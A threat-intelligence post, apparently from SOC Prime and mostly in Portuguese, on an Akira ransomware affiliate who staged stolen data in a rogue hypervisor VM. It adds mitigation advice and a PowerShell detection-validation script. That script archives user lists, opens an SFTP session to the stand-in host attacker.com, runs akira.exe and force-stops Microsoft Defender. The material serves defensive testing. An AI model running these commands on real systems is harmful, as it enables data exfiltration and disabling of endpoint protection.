SOC Prime Bias: Alto

19 Jun 2026 07:31 UTC

Akira, LimeWire e o Gosto Amargo da Exfiltração de Dados

Author Photo
SOC Prime Team linkedin icon Seguir
Akira, LimeWire e o Gosto Amargo da Exfiltração de Dados
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Um afiliado do ransomware Akira obteve acesso não autorizado a um hipervisor e criou uma nova máquina virtual para usar como ambiente de preparação oculto. O atacante usou esta VM isolada para evitar a monitoração de segurança, preparar dados com o WinRAR, e exfiltrar arquivos através da plataforma de compartilhamento de arquivos Easyupload.io. O caso demonstra como atores de ameaça continuam a abusar de serviços legítimos de upload para roubo de dados.

Investigação

A investigação combinou telemetria EDR, logs de eventos do Windows e histórico de navegação do Microsoft Edge para reconstruir a intrusão. Analistas também recuperaram uma imagem VHDX da máquina virtual maliciosa, que revelou o atacante desativando o Microsoft Defender e configurando a operação do ransomware Akira. A análise forense da VM expôs as exatas ferramentas, websites e fluxo de trabalho usados durante as fases de preparação e exfiltração.

Mitigação

As organizações devem monitorar o aparecimento de novos ou não autorizados terminais e instâncias de máquinas virtuais em todo o seu ambiente. Forte visibilidade em acesso remoto a sistemas críticos, como hipervisores e controladores de domínio, é essencial. Também é importante restringir ou monitorar de perto o acesso a serviços conhecidos de compartilhamento de arquivos e upload rápido que possam ser usados para exfiltração.

Resposta

Se for identificado acesso não autorizado ao hipervisor, isole imediatamente o hipervisor afetado e quaisquer máquinas virtuais recém-criadas. Realize análise forense das imagens de disco da VM para determinar a extensão da preparação e exfiltração de dados. Revise logs de acesso para rastrear o ponto de entrada original e confirmar que não restou acesso persistente do atacante.

Fluxo de Ataque

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has gained initial access and is looking to escalate the impact. They first enumerate sensitive files by checking for known text files like AdUsers.txt. To prepare for exfiltration, they use WinRAR.exe to compress the data. They then prepare their exfiltration tool, WinSCP.exe, and finally execute the akira.exe ransomware payload. To prevent the EDR/Antivirus from killing the process, they attempt to stop the Windefend service. This specific sequence of command-line arguments and service status changes is intended to trigger the Akira-specific detection logic.

  • Regression Test Script:

    # Simulation Script for Akira Ransomware Detection Validation
    # NOTE: This script requires administrative privileges to stop the Defender service.
    
    Write-Host "[+] Starting Akira Ransomware Simulation..." -ForegroundColor Cyan
    
    # 1. Simulate Discovery/Enumeration (T1119)
    Write-Host "[+] Step 1: Simulating file enumeration via Notepad..."
    Start-Process notepad.exe -ArgumentList "AdUsers.txt"
    Start-Sleep -Seconds 2
    
    # 2. Simulate Data Archiving (T1560.003)
    # Note: We assume WinRAR is present or we simulate the command line activity
    Write-Host "[+] Step 2: Simulating data archival with WinRAR..."
    Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
    Start-Sleep -Seconds 2
    
    # 3. Simulate Exfiltration Tool Prep (T1105)
    Write-Host "[+] Step 3: Simulating exfiltration tool execution..."
    Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
    Start-Sleep -Seconds 2
    
    # 4. Simulate Ransomware Execution (T1204.002)
    Write-Host "[+] Step 4: Simulating Akira payload execution..."
    Start-Process "akira.exe"
    Start-Sleep -Seconds 2
    
    # 5. Simulate Disabling Defender (T1564.006)
    # This triggers EventID 7036 in the System Log
    Write-Host "[+] Step 5: Attempting to stop Microsoft Defender..."
    Stop-Service -Name "Windefend" -Force
    
    Write-Host "[+] Simulation Complete. Check SIEM for alerts." -ForegroundColor Green
  • Cleanup Commands:

    # Cleanup Script
    Write-Host "[+] Cleaning up simulation artifacts..." -ForegroundColor Cyan
    
    # Restart Defender Service
    Start-Service -Name "Windefend"
    
    # Remove simulated files
    Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue
    
    Write-Host "[+] Cleanup complete." -ForegroundColor Green